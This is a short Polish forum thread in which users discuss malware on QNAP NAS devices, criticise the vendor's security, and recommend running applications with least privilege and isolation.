Czasem lepiej coś pisać od nowa. W takiej sytuacji można się nie spodziewać takiego rozwiązania w Q.
To nie zawsze tak jest. Backdoory są i zawsze bedą. Pamiętacie backdoor bash'a, samby i SSH?
Wszystko musi być odpalone na root'ie. Inaczej się nie da... a i tak backdoor jest. Także..... jeśli szukacie safety rozwiązania, to każda aplikacja odpalona osobno na wirtualizacji, bez możliwosci modyfikacji plików na współdzielonych zasobach. Czyli... kupa.
Żartujesz? Jak dla mnie większym profesjonalizem wykazały się osoba/y które napisały ten malware - moje uwagi w poprzednich postach co do firmy qnap. Jeszcze jakby zamiast malware powstał ransomware to 'śmiechom' nie byłoby końca.
Ale w przyszłości będą podobne błędy. Może dzięki odseparowaniu uprawnień nieruszony (na pewno utrudiony) zostałby fw który jest w pamięci a co za tym idzie
postawienie wszystkiego na nowo rozwiązałoby problem. Aplikacje powinny działać z najmniejszymi możliwymi uprawnieniami
Mogą Cię zainteresować
Użytkownicy znaleźli tą stronę używając tych słów:
- Vu
- aktualizacja przez konsole